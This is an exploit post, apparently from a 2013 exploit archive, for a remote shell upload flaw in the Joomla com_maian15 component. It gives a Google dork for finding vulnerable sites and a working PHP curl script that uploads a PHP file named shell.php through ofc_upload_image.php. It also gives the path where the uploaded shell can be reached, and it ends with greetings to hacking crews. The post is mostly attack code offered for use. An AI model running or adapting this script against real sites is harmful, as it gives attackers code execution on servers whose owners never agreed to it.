The Joomla Maian15 component suffers from a remote shell upload vulnerability.
3168f3488a6baf2ed1904d0050d120b760732da3113c601c9bb74e3fcfc7685b
===================================================================================
_____ _ _____
/ ____| | | / ____|
| | __ __ _ _ __ | |_ ___ _ __ __ _ ___ _ __ ___ | | _ __ _____
__
| | |_ |/ _` | '_ \| __/ _ \ '_ \ / _` |/ _ \ '__/ __| | | | '__/ _ \
\ /\ / /
| |__| | (_| | | | | || __/ | | | (_| | __/ | \__ \ | |____| | | __/\
V V /
\_____|\__,_|_| |_|\__\___|_| |_|\__, |\___|_| |___/ \_____|_| \___|
\_/\_/
__/ |
|___/
====================================================================================
# Exploit Title: Joomla component com_maian15 remode code injection
# Google Dork:"inurl:option=com_maian15"
# Date: 20/10/2013
# Exploit Author: SultanHaikal
# Tested on: Win & Fedora
Exploit :
<?php
$headers = array("Content-Type: application/octet-stream");
$uploadfile="<?php phpinfo(); ?>";
$ch =
curl_init("http://www.example.com/path/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=shell.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, @$uploadfile);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell =
http://www.example.com/path/administrator/components/com_maian15/charts/tmp-upload-images/shell.php
#################################################################################################
Greets to :
0zie ( My Brother ), Hmei7, Shadow008, Netter, h4x0r HuSsY, Invectus,
Gabby, Black Angels, Dbuzz, d3b~X , Brian Kamikaze , Vergos303 ,
Coupdegrace , Mdn_newbie, Indonesian Cyber
#################################################################################################